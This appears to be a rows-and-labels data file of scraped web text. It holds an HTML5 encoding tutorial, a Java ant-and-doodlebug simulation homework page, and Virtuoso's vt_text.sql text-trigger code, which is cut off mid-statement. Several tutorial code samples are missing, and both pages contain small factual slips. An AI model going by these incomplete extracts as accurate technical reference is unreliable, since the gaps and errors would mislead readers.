content
stringlengths
228
999k
pred_label
stringclasses
1 value
pred_score
float64
0.5
1
Unlimited Plugins, WordPress themes, videos & courses! Unlimited asset downloads! From $16.50/m Advertisement 1. Code 2. HTML5 HTML5 Mastery: Encoding by Difficulty:IntermediateLength:MediumLanguages: This post is part of a series called HTML5 Mastery Class. HTML5 Mastery: Scoping Rules HTML5 Mastery: Fragments HTML5 Mastery Encoding is just one of those things that need to be done right. If done wrong, everything seems to be broken and nothing works. If done right, no one will notice. This makes dealing with encoding so annoying. Nevertheless, we are quite lucky and most of the things are already really well-prepared. We only need to ensure that our documents are saved (and transmitted) with the right encoding. The right encoding is the one we specify. It could be anything, as long as it contains all characters we need, and as long as we stay consistent. There are three important text encoding rules for HTML: 1. Load the content with the right encoding. 2. Transmit the content with the same encoding. 3. Ensure that the client reads the content with the specified encoding. In this article we will have a closer look at all three rules in more detail, especially the second and the third. In the end we will also look at form encoding, which has nothing to do with text encoding directly, but does indirectly. We will see why there is some connection. Choosing the Right Encoding Either we know directly that our content should be delivered in some exotic encoding or we should just pick UTF-8. There are many reasons why we would want to use UTF-8. It is not a great format for storing characters in memory, but it is just wonderful as a basis for data exchange and content transmission. It is basically a no-brainer. Nevertheless, one of the more common mistakes is to save files without proper encoding. As there is no text without encoding, we should choose the encoding carefully. Users of Sublime Text and most other text editors have probably never faced a problem with wrong encoding, since these editors save in UTF-8 by default. There are editors, mostly for the Windows platform, which a use different default format, e.g., Windows-1252. Even in Sublime Text it is one of the more standard operations to change the encoding of the file. In the File menu we select Save with Encoding and select the one we want. That’s it! Saving Text Encoding Sublime Text In principle every more advanced editor should have such options. Sometimes they are contained in an advanced save menu. For instance, the editor for Microsoft’s Visual Studio triggers a special dialog after clicking Advanced Save Options… in the File menu. Visual Studio Advanced Save We should make sure to use the right encoding. This will use the corresponding bytes for our content. UTF-8 has the major advantage of only requiring a single byte if we do not use a special character. At most 4 bytes per character are consumed. This is dynamic and makes UTF-8 an ideal format for text storage and transmission. The caveat is, however, that UTF-8 is not the best format for using strings from memory. Controlling the Transmission The HTTP protocol transmits data as plain text. Even if we decide to encode the transmitted content as GZip or if we use HTTPS, which encrypts the content, the underlying content is still just plain text. We’ve already learned that there is no such thing as just plain text. We always need to associate the content with some encoding to get a text representation. An HTTP message is split in two parts. The upper part is called the headers. Separated by an empty line is the lower part: the body. There are always at least two HTTP messages: a request and its associated response. Both types of messages share this structure. The body of a response is the content we want to transmit. The body of a request is only of interest for form submission, which we’ll care about later. If we want to provide some information on the encoding of the content, we have to supply some information in the header. The following header tells the receiving side that the body contains a special text format called HTML, using the UTF-8 character set. There is also the Content-Encoding header. We can easily confuse the content encoding with the actual text encoding of the content. The former is used to specify encoding of the whole package, e.g. GZip, while the latter is used as an initial setting for, e.g., parsing the provided content. If we care about the correctness of this step we have to make sure that our web server sends the correct header. Most web frameworks offer such an ability. In PHP we could write: In Node.js we may want to use the following, where res is the variable representing the request: The transmitted header will set the text scanner of the HTML input to the provided setting. In the case of the previous example we use UTF-8. But wait: Initial setting! There are many ways to override this. If the actual content is not UTF-8, the scanner may recognize this and change the setting. Such a change may be triggered by Byte-Order-Mark (known as BOM) detection or by finding encoding-specific patterns in the content. In contrast, the former looks for artificially prepended patterns. Finally, the encoding may change due to our HTML code. This can only be changed once. Fixing the Encoding Once the DOM constructor hits a meta tag, it will look for a charset declaration. If one is found, the character set will be extracted. If we can extract it successfully and if the encoding is valid, we set the new encoding for scanning further characters. At this point the encoding will be frozen, and no further changes are possible. There is just one caveat. To check if the previous scanning was alright, we need to compare the characters that have already been scanned with the characters that would have been scanned. Hence we need to see if changing the encoding earlier would have made some difference. If we find a difference, we need to restart the whole parsing procedure. Otherwise the whole DOM structure may be wrong up to this point. As a consequence we’ve already learned two lessons: 1. Place the <meta charset="utf-8"> (or some other encoding) tag as soon as possible. 2. Only use ASCII characters before specifying the charset attribute in HTML. Finally, a good starter for a boilerplate looks as follows. As we learned in the previous article, we can omit the head and body tags. The snippet does two things right: It uses the correct document type, and it selects the character set as soon as possible. The only remaining question is: What happens if I forget one of these three steps? Well, the first and third steps are the most important ones. The transmission is actually not that bad. If no initial encoding is given from the HTTP headers, the browser will select the initial encoding based on the user’s locale. With a German locale we get Windows-1252. This is actually the default for most countries. Some countries, like Poland or Hungary, select Latin2, also known as iso-8859-2. In principle we do not have to worry about this initial encoding if we followed the best practices described earlier. ASCII is a subset of Unicode, and most of the listed encodings are actually just ASCII extensions to satisfy the specific needs of one or more countries. If we only use basic ASCII characters until the character set is specified, we should be fine. Much more severe is a conflict between the stored / read or generated data, which is delivered to the client, and the statement in the meta tag. If something went wrong we may see renderings like the following. This is not a pleasant user experience. Encoding Problem Coming back to determining the right encoding, there are many reasons why UTF-8 would be the best choice. Any other encoding should at least be sufficient for the characters we want to display. However, if we provide form input fields, we may be in trouble. At this point we do not control the characters that are used any more. Users are allowed to input anything here. Let’s see how we can control the encoding for form input. Submitting Forms A form is submitted with a certain encoding type, which is not the same as the encoding type of a server’s response, e.g. GZip. The form’s encoding type determines how the form is serialized before sending it to the server. It is particularly useful in conjunction with the HTTP verb. Ordinary form submissions use POST as HTTP verb, but GET, PUT and DELETE are also common. Only POST and PUT are supposed to use the body for content transmission in the request. The browser will construct the content with respect to the choice of the enctype attribute of the <form> element, specifying the encoding type. The encoding type is transported by setting the Content-Type header in the HTTP request. There are three well-established encoding types: 1. URL encoded (default value, explicitly application/x-www-form-urlencoded) 2. Plain text (text/plain) 3. Multipart (multipart/form-data) The first and the second are quite similar, but they have subtle (and very important) differences. The third variant is the most powerful method. It even allows the transporting of arbitrary files as attachments. The key difference between the first two types is that URL encoded form transmission percent-encodes all names and values, which is not done by plain text. The percent-encoding guarantees that the receiving side can distinguish between names and values. This guarantee does not exist with plain text form submission. The third variant uses a boundary string to separate the entries, which is unique by construction. Let’s visualize the differences by submitting a simple form. The form contains the following code: Submitting the form without specifying any encoding type transmits the following body: The URL encoding transforms the white-space characters to plus signs. Existing plus signs, like all “special” characters, are transformed by the percent-encoding rules. This especially applies to new lines, originally represented by \r\n, which are now displayed as %0D%0A. Let’s see what the outcome for plain text encoding looks like. The pairs are split by new lines. This is especially problematic for multi-line content and may lead to incorrect representations. In a way the multipart encoding combines the advantages of plain text submission with a defined boundary, which essentially solves the problems of the plain text encoding. The only drawback is the increased content length. The last two form encoding methods also displayed special characters exactly as we’ve entered them. Form transmission primarily uses the accept-charset attribute of the corresponding `</form> ` element. If no such attribute is given, the encoding of the page is used. Again, setting the correct encoding is important. In the future we will see a fourth encoding type, called `application/json`. As the name suggests, it will pack the form content into a JSON string. ## Conclusion Choosing the right encoding can be as easy as just picking UTF-8. Typical problems can be avoided by using the same encoding consistently. Declaring the encoding during transport is certainly useful, although not required, especially if we follow best practices for placing a `` element with the `charset` attribute. Form submission is a process that relies on the right encoding choice—not only for the text, but for the submission itself. In general we can always choose `multipart/form-data` as `enctype`, even though the default encoding type might be better (smaller) in most scenarios. In production we should never use `text/plain`. ## References * [UTF-8: The Secret of Character Encoding](https://htmlpurifier.org/docs/enduser-utf8.html) * [W3C Specification: Form Submission](http://www.w3.org/TR/html5/forms.html#attr-fs-enctype) * [W3C Specification: Encoding](http://www.w3.org/TR/encoding/) * [W3C Specification: Initial Encoding Determination](http://www.w3.org/TR/html51/syntax.html#the-input-byte-stream) * [StackOverflow: What is the boundary in multipart/form-data?](https://stackoverflow.com/questions/3508338/what-is-the-boundary-in-multipart-form-data) Advertisement Advertisement Advertisement Looking for something to help kick start your next project? Envato Market has a range of items for sale to help get you started.
__label__pos
0.861971
Program of bug simulation , JAVA Programming You will be creating a World that consists of ants and doodlebugs. Each time you click the board each bug will do some of the following: move, bread, eat, and starve. Ants will function in a certain way, and doodlebugs in another. This assignment is based on Absolute Java. 900_Bug Simulation 1.png Bug Rules Ants Move 1. Every time step the ant will attempt to move. 2. Pick a random direction using a random generator (up, right, down, or left). 3. If the space is on the grid, and not occupied then the ant will move there. Breed 1. If an ant survives 3 time steps he will attempt to breed. 2. He breeds by creating a new ant in a space adjacent to himself. 3. If there is no empty space adjacent to himself to breed then he will not do so. 4. He will then wait 3 more time steps until tries to breed again. Doodlebugs Move 1. Every time step the doodlebug will move. 2. First he will check out each direction. If there is an ant in an adjacent space he will move there (consequently taking up the ants space and eating him!) 3. If there was no ant in an adjacent space he will move just like ants do. 4. Note: doodlebugs can't eat other doodlebugs Breed 1. If a doodlebug survives 8 time steps he will attempt to breed. 2. He breeds in the same manner as an ant. Starve 1. If an ant has not eaten an ant within the last 3 time steps, then at the end of the last time step he will die of starvation. You will remove him from the grid. UML Ants and Doodlebugs will extend from a generic Organism. Create a UML diagram for the Organism, Ant and Doodlebug. This diagram may change as you develop your design, but having a basic flow will greatly help in the implementation. Provided Files 1. World.java 2. Organism.java 3. Ant.java 4. Doodlebug.java 5. ant.png 6. doodlebug.png Word Methods you will use in your classes. Don't modify this class. public Organism getAt(int x, int y) 1. Returns the Organism at the x, y position in the grid. 2. If there is no organism it returns null public void setAt(int x, int y, Organism bug) 1. Sets the entry at the x, y position in the grid to the specified organism public boolean pointInGrid(int x, int y) 1. Returns true if the point x, y is in the grid and false if it goes beyond the grid space (e.g. if x = -1 that is not in the grid) Images 1. Put the two images in an images folder within your src What you need to edit 1. Organism.java 2. Ant.java 3. Doodlebug.java Organims Here are the methods that the World calls on the Organisms. I assume you will want to make more methods, such as move... Organism(World world, int x, int y) 1. Creates a new Organism 2. The coordinates in the grid (X and Y) are required so you can pick a new location relative to its current to move to, and breed at. 3. The World is required so you can call methods like getAt(x, y), setAt(x, y), and pointInGrid(x, y) on it. public abstract String toString() 1. This method is written for you 2. Returns the string representation of the organism ("ant", "doodlebug"). Used by the World to determine which type of organism it is. public void resetSimulation() 1. This method has been written for you 2. You will need to keep track of weather the organism has simulated this time step or not in an attribute of the class. This is important as it stops an organism from moving to a new place in the grid and then simulating again. public boolean simulate() 1. This will set the attribute that keeps track of weather it has simulated to true. This method returns true if it simulates, and false if it doesn't (has already simulated) 2. If the organism was created this time step don't do the rest 3. Call move, then breed, then starve (only for doodlebugs). 4. You will then increment a time step counter Ant and DoodleBug 1. I want you to figure out what goes here Posted Date: 2/20/2013 1:08:00 AM | Location : United States Related Discussions:- Program of bug simulation , Assignment Help, Ask Question on Program of bug simulation , Get Answer, Expert's Help, Program of bug simulation Discussions Write discussion on Program of bug simulation Your posts are moderated Related Questions Write nonrecursive implementations of the min() and floor() methods in BST.java. Make sure to use only one return in your method. Use an insertion sort (discussed in class) to s Decode the Code Smugglers are becoming very smart day by day. Now they have developed a new technique of sending their messages from one smuggler to another. In their new techn i have got project of Vending machine. would you please help me about how to start and how to use coding.thanks Write code in JavaScript language to show the odd numbers among 20 to 100 using FOR statement. Note: No requirement to write whole HTML program. Just JavaScript code of need p Indeed API integration and search bar fix (Java, Wordpress and PHP) I start a job portal on WP developed out of a customized template. We need an expert in integrating Indeed AP Objective: create a simple object, put that object in a simple collection class, use that object and collection in a simple GUI application. Specification:  Consider a Librar How many JSP scripting elements and what are they? Ans) Three scripting language elements are there: a)      declarations, b)      scriptlets, c)       expressions. What are the different messaging paradigms JMS supports? Ans) Publish and Subscribe i.e. pub/suc and Point to Point i.e. p2p. A value, the data assigned to a variable, may contain any sort of data. Though, JavaScript considers data to fall into many possible types. Based on the type of data, certain opera
__label__pos
0.99176
File: vt_text.sql package info (click to toggle) virtuoso-opensource 6.1.6+dfsg2-4 • links: PTS, VCS • area: main • in suites: bullseye, buster, sid, stretch • size: 260,992 kB • ctags: 125,220 • sloc: ansic: 652,748; sql: 458,419; xml: 282,834; java: 61,031; sh: 40,031; cpp: 36,890; cs: 25,240; php: 12,692; yacc: 9,523; lex: 7,018; makefile: 6,157; jsp: 4,484; awk: 1,643; perl: 1,013; ruby: 1,003; python: 326 file content (481 lines) | stat: -rw-r--r-- 17,952 bytes parent folder | download | duplicates (2) 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 -- -- vt_text.sql -- -- $Id$ -- -- Text triggers support. -- -- This file is part of the OpenLink Software Virtuoso Open-Source (VOS) -- project. -- -- Copyright (C) 1998-2012 OpenLink Software -- -- This project is free software; you can redistribute it and/or modify it -- under the terms of the GNU General Public License as published by the -- Free Software Foundation; only version 2 of the License, dated June 1991. -- -- This program is distributed in the hope that it will be useful, but -- WITHOUT ANY WARRANTY; without even the implied warranty of -- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -- General Public License for more details. -- -- You should have received a copy of the GNU General Public License along -- with this program; if not, write to the Free Software Foundation, Inc., -- 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA -- -- create procedure DB.DBA.execstmt (in stmt varchar, out stat varchar, out msg varchar) { stat := '00000'; exec (stmt, stat, msg, vector (), 0, null, null); if (stat <> '00000') { return 1; } return 0; } ; create procedure DB.DBA.vt_create_ftt (in tb varchar, in id varchar, in dbcol varchar, in is_intr integer) { declare stmt, stat, msg, verr varchar; declare tbn0, tbn1, tbn2, data_table_suffix, theuser varchar; -- tb := complete_table_name (fix_identifier_case (tb), 1); verr := ''; tb := complete_table_name ((tb), 1); tbn0 := name_part (tb, 0); tbn1 := name_part (tb, 1); tbn2 := name_part (tb, 2); data_table_suffix := concat (tbn0, '_', tbn1, '_', tbn2); data_table_suffix := DB.DBA.SYS_ALFANUM_NAME (replace (data_table_suffix, ' ', '_')); theuser := user; if (theuser = 'dba') theuser := 'DBA'; if (not exists (select 1 from DB.DBA.SYS_VT_INDEX where 0 = casemode_strcmp (VI_TABLE, tb))) { verr := 'FT035'; stat := '42S02'; msg := sprintf ('Text index should be enabled for the table "%s"', tb); goto err; } if (not isstring (id)) select VI_ID_COL into id from DB.DBA.SYS_VT_INDEX where 0 = casemode_strcmp (VI_TABLE, tb); if (not isstring (dbcol)) select VI_COL into dbcol from DB.DBA.SYS_VT_INDEX where 0 = casemode_strcmp (VI_TABLE, tb); if (not exists (select 1 from DB.DBA.SYS_COLS where "TABLE" = tb and "COLUMN" = id)) { stat := '42S22'; verr := 'FT036'; msg := sprintf ('The id column "%s" does not exist in table "%s" definition', id, tb); goto err; } if (not exists (select 1 from DB.DBA.SYS_COLS where "TABLE" = tb and "COLUMN" = dbcol)) { stat := '42S22'; verr := 'FT037'; msg := sprintf ('The data column "%s" does not exist in table "%s" definition', dbcol, tb); goto err; } -- prevent making of error messages if creation is internal if (is_intr = 2 and exists (select 1 from DB.DBA.SYS_KEYS where KEY_TABLE = sprintf ('%s.%s.%s_%s_QUERY', tbn0, tbn1, tbn2, dbcol))) return; -- Upgrade an old database if (not exists (select 1 from DB.DBA.SYS_PROCEDURES where P_NAME = sprintf ('%I.%I.VT_HITS_%I', tbn0, tbn1, tbn2))) { stmt := concat ( sprintf ( 'create procedure "%I"."%I"."VT_BATCH_PROCESS_%s" (inout vtb any, in doc_id int) {\n',tbn0, tbn1, data_table_suffix), 'declare invd any;\n invd := vt_batch_strings_array (vtb);\n if (length (invd) < 1) return;\n', sprintf ('"%I"."%I"."VT_HITS_%I" (vtb, invd);\n', tbn0, tbn1, tbn2), sprintf ( 'log_text (''"%I"."%I"."VT_BATCH_REAL_PROCESS_%s" (?, ?)'', invd, doc_id);\n', tbn0, tbn1, data_table_suffix), 'log_enable (0);\n', sprintf ( '"%I"."%I"."VT_BATCH_REAL_PROCESS_%s" (invd, doc_id);\n',tbn0, tbn1, data_table_suffix), 'log_enable (1);}\n'); DB.DBA.execstr (stmt); } -- Tables definition stmt := sprintf ('CREATE TABLE "%I"."%I"."%I" (TT_WORD VARCHAR, TT_ID INTEGER, TT_QUERY VARCHAR, TT_CD VARCHAR, TT_COMMENT VARCHAR, TT_XPATH VARCHAR, TT_PREDICATE VARCHAR, PRIMARY KEY (TT_WORD, TT_ID))', tbn0, tbn1, concat (tbn2, '_', dbcol, '_QUERY')); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := sprintf ('CREATE TABLE "%I"."%I"."%I" (TTU_T_ID INTEGER, TTU_U_ID INTEGER, TTU_NOTIFY VARCHAR, TTU_COMMENT VARCHAR, PRIMARY KEY (TTU_T_ID, TTU_U_ID))', tbn0, tbn1, concat (tbn2, '_', dbcol, '_USER')); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := sprintf ('CREATE TABLE "%I"."%I"."%I" (TTH_U_ID INTEGER, TTH_D_ID any, TTH_T_ID INTEGER, TTH_TITLE VARCHAR, TTH_URL VARCHAR, TTH_TS TIMESTAMP, TTH_NOTIFY VARCHAR, PRIMARY KEY (TTH_U_ID, TTH_TS, TTH_D_ID, TTH_T_ID))', tbn0, tbn1, concat (tbn2, '_', dbcol, '_HIT')); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; -- Trigger definition stmt := sprintf ('CREATE TRIGGER "%I_FTT_D" AFTER DELETE ON "%I"."%I"."%I" ORDER 3 %s DELETE FROM "%I"."%I"."%I_%I_HIT" WHERE TTH_D_ID = "%I"; %s', tbn2, tbn0, tbn1, tbn2, '{', tbn0, tbn1, tbn2, dbcol, id, '}'); -- Procedures definition if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := concat ( sprintf ('create procedure "%I"."%I"."VT_HITS_%I"', tbn0, tbn1, tbn2), '(inout vtb any, inout strs any) { declare tried, hits, doc_id, u_id integer; declare len, inx int; inx := 0;len := length (strs);tried := 0;', sprintf ('if (registry_get (''tt_%s_%s_%s'') = ''OFF'') return;', tbn0, tbn1, tbn2), 'while (inx < len) { for select TT_ID, TT_QUERY, TT_COMMENT, TT_CD, TT_XPATH from ', sprintf ('"%I"."%I"."%I"', tbn0, tbn1, concat(tbn2, '_', dbcol, '_QUERY')), ' where TT_WORD = aref (strs, inx) do { declare ids, ntf, xp any; tried := tried + 1; declare ii, is_xp int; is_xp := 0; if (TT_XPATH is not null and TT_XPATH <> '''') { xp := deserialize (TT_QUERY); ids := vt_batch_match (vtb, xp); is_xp := 1; } else ids := vt_batch_match (vtb, TT_QUERY); hits := hits + length (ids); ii := 0;', sprintf ('select TTU_NOTIFY, TTU_U_ID into ntf, u_id from "%I"."%I"."%I_%I_USER" where TTU_T_ID = TT_ID;', tbn0, tbn1, tbn2, dbcol), 'while (ii < length (ids)) { doc_id := aref (ids, ii); if (<INSERT_COND>) { ', sprintf ('if ((is_xp = 0) or (is_xp = 1 and exists (select 1 from "%I"."%I"."%I" where "%I" = doc_id and xpath_contains ("%I", TT_XPATH))))', tbn0, tbn1, tbn2, id, dbcol), sprintf ('insert soft "%I"."%I"."%I" (TTH_U_ID, TTH_T_ID, TTH_D_ID, TTH_NOTIFY) select TTU_U_ID, TT_ID, doc_id, ntf from "%I"."%I"."%I" where TTU_T_ID = TT_ID; } ii := ii + 1; } } inx := inx + 2; } --dbg_obj_print ('' batch '', length (strs) / 2, ''distinct tried '', tried, '' hits '', hits); }', tbn0, tbn1, concat (tbn2, '_', dbcol, '_HIT'), tbn0, tbn1, concat (tbn2, '_', dbcol, '_USER'))); -- for WebDAV resources display only if user have read access if (0 <> casemode_strcmp (tb, 'WS.WS.SYS_DAV_RES')) stmt := replace (stmt, '<INSERT_COND>', '1 = 1'); else stmt := replace (stmt, '<INSERT_COND>', 'WS.WS.CHECK_READ_ACCESS (u_id, doc_id)'); -- dbg_obj_print (stmt); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := sprintf (' create procedure "%I"."%I"."TT_WORD_FREQ_%I" (in w varchar) { declare l1, l2 integer; l1 := 0; l2 := 0; whenever not found goto none; select sum (length (VT_DATA)), sum (length (VT_LONG_DATA)) into l1, l2 from "%I"."%I"."%I_%I_WORDS" where VT_WORD = w; none: return (coalesce (l1, 0) + coalesce (l2, 0)); }', tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := sprintf ('create procedure "%I"."%I"."TT_QUERY_%I" (in exp varchar, in u_id int, in comment varchar, in notify varchar, in user_data varchar := null, in predicate varchar := null) { declare t_id, ix, len integer; declare w any; t_id := coalesce ((select top 1 TT_ID + 1 from "%I"."%I"."%I_%I_QUERY" order by TT_ID desc), 1); w := "%I"."%I"."TT_QUERY_WORD_%I" (exp, 0); len := length (w); ix := 0; while (ix < len) { insert into "%I"."%I"."%I_%I_QUERY" (TT_ID, TT_QUERY, TT_WORD, TT_COMMENT, TT_CD, TT_PREDICATE) values (t_id, exp, aref (w, ix), comment, user_data, predicate); ix := ix + 1; } insert soft "%I"."%I"."%I_%I_USER" (TTU_T_ID, TTU_U_ID, TTU_NOTIFY, TTU_COMMENT) values (t_id, u_id, notify, comment); }', tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, dbcol); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; -- XPATH search stmt := sprintf ('create procedure "%I"."%I"."TT_XPATH_QUERY_%I" (in exp varchar, in u_id int, in comment varchar, in notify varchar, in user_data varchar := null, in predicate varchar := null) { declare t_id, ix, len integer; declare w any; declare xp any; xp := xpath_text (exp); t_id := coalesce ((select top 1 TT_ID + 1 from "%I"."%I"."%I_%I_QUERY" order by TT_ID desc), 1); w := "%I"."%I"."TT_QUERY_WORD_%I" (xp, 1); len := length (w); ix := 0; while (ix < len) { insert into "%I"."%I"."%I_%I_QUERY" (TT_ID, TT_QUERY, TT_WORD, TT_COMMENT, TT_XPATH, TT_CD, TT_PREDICATE) values (t_id, serialize (xp), aref (w, ix), comment, exp, user_data, predicate); ix := ix + 1; } insert soft "%I"."%I"."%I_%I_USER" (TTU_T_ID, TTU_U_ID, TTU_NOTIFY, TTU_COMMENT) values (t_id, u_id, notify, comment); }', tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, dbcol); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; -- end XPATH search declare pname varchar; pname := sprintf ('"%I"."%I"."TT_QUERY_WORD_1_%I"', tbn0, tbn1, tbn2); stmt := sprintf ('create procedure %s (in tree any, inout best_w varchar, inout score integer, in topop integer, inout words any) { declare op integer; if (isarray (tree)) { op := aref (tree, 0); if (op = 4 or op = 1210 or op = 1209) { declare inx int; inx := 0; while (inx < length (tree)) { %s (aref (tree, inx), best_w, score, op, words); inx := inx + 1; } } else if (op = 1211) { %s (aref (tree, 2), best_w, score, op, words); } else if (op = 1) { declare ct int; declare searched_word varchar; searched_word := aref (tree, 2); if (strchr (searched_word, ''*'') is not null) return; ct := "%I"."%I"."TT_WORD_FREQ_%I" (searched_word); if (ct < score and topop <> 3) { score := ct; best_w := searched_word; } else if (topop = 3) best_w := searched_word; } else if (op = 3) { declare inx, sc1 int; inx := 0; while (inx < length (tree)) { best_w := null; sc1 := score; score := 1000000000; %s (aref (tree, inx), best_w, score, op, words); if (words is null and best_w is not null) words := vector (best_w); else if (best_w is not null) words := vector_concat (words, vector (best_w)); score := sc1; best_w := null; inx := inx + 1; } } } }', pname, pname, pname, tbn0, tbn1, tbn2, pname); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := sprintf ('create procedure "%I"."%I"."TT_QUERY_WORD_%I" (in exp varchar, in is_xpath integer) { declare tree, ws1 any; declare w varchar; declare sc int; sc := 1000000000; w := ''__''; ws1 := null; if (is_xpath = 0) tree := vt_parse (exp); else tree := exp; %s (tree, w, sc, 0, ws1); if (w is not null) return vector (w); else if (isarray (ws1)) return ws1; return vector (''__''); }', tbn0, tbn1, tbn2, pname); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; stmt := sprintf ('create procedure "%I"."%I"."TT_NOTIFY_%I" () { declare stat, msg, ntf, comment varchar; declare _u_id, _ts, _d_id, _t_id, rc_call any; for select distinct TTH_NOTIFY as _tt_notify from "%I"."%I"."%I_%I_HIT" where TTH_NOTIFY like ''%%@%%'' do { declare _message, _msg_tit varchar; declare _cnt_hits integer; declare _short_text varchar; declare hits_data any; _cnt_hits := 0; _message := ''\\r\\nQuery/Hit Date/Document ID''; hits_data := vector (); for select TTH_U_ID, TTH_TS, TTH_D_ID, TTH_T_ID, TTH_NOTIFY from "%I"."%I"."%I_%I_HIT" where TTH_NOTIFY = _tt_notify order by TTH_TS do { whenever not found goto nfq; select coalesce (TT_COMMENT, TT_QUERY) into comment from "%I"."%I"."%I_%I_QUERY" where TT_ID = TTH_T_ID; nfq: if (comment is null) comment := ''*** no query ***''; _cnt_hits := _cnt_hits + 1; hits_data := vector_concat (hits_data, vector (vector (comment, TTH_TS, TTH_D_ID))); _message := concat (_message, ''\\r\\n'', comment, ''/'', substring (datestring (TTH_TS), 1, 19), ''/'', cast (TTH_D_ID as varchar)); } stat := ''00000''; _msg_tit := concat (''Subject: Text trigger notification: New '', cast (_cnt_hits as varchar) , '' hit(s) registered\\r\\n''); _message := concat (_msg_tit, _message); rc_call := 0; if (__proc_exists (''%s.%s.%s_INFO_TEXT'')) { rc_call := call (''%s.%s.%s_INFO_TEXT'') (_tt_notify, hits_data); } if (not rc_call) { exec (''smtp_send (null,?,?,?)'', stat, msg, vector (_tt_notify, _tt_notify, _message)); } update "%I"."%I"."%I_%I_HIT" set TTH_NOTIFY = '''' where TTH_NOTIFY = _tt_notify; } return; }', tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, dbcol, tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, tbn0, tbn1, tbn2, dbcol); --dbg_obj_print (stmt); if (DB.DBA.execstmt (stmt, stat, msg)) goto err; insert into DB.DBA.SYS_SCHEDULED_EVENT (SE_NAME, SE_START, SE_SQL, SE_INTERVAL) values (sprintf ('Notification for text hits on "%s.%s.%s"', tbn0, tbn1, tbn2), now (), sprintf ('"%I"."%I"."TT_NOTIFY_%I"()', tbn0, tbn1, tbn2), 10); return 0; err: if (stat <> '42S01' and verr <> 'FT035' and verr <> 'FTT036' and verr <> 'FT037') DB.DBA.vt_drop_ftt (tb, dbcol); if (is_intr <> 2 and verr <> '') { signal (stat, msg, verr); } else if (is_intr <> 2 and verr = '') { signal (stat, msg); } } ; create procedure DB.DBA.vt_drop_ftt (in tb varchar, in dbcol varchar) { declare stmt, stat, msg varchar; declare tbn0, tbn1, tbn2 varchar; -- tb := complete_table_name (fix_identifier_case (tb), 1); tb := complete_table_name ((tb), 1); tbn0 := name_part (tb, 0); tbn1 := name_part (tb, 1); tbn2 := name_part (tb, 2); if (not exists (select 1 from DB.DBA.SYS_VT_INDEX where 0 = casemode_strcmp (VI_TABLE, tb))) signal ('42S02', sprintf ('Text index not defined for "%s"', tb), 'FT034'); if (not isstring (dbcol)) select VI_COL into dbcol from DB.DBA.SYS_VT_INDEX where 0 = casemode_strcmp (VI_TABLE, tb); stmt := sprintf ('DROP TRIGGER "%I"."%I"."%I_FTT_D"', tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE "%I"."%I"."VT_HITS_%I"' , tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE "%I"."%I"."TT_WORD_FREQ_%I"', tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE "%I"."%I"."TT_QUERY_%I"', tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE "%I"."%I"."TT_XPATH_QUERY_%I"', tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE "%I"."%I"."TT_QUERY_WORD_1_%I"', tbn0, tbn1, tbn2); DB.DBA.execstmt (stmt, stat, msg); stmt := sprintf ('DROP PROCEDURE 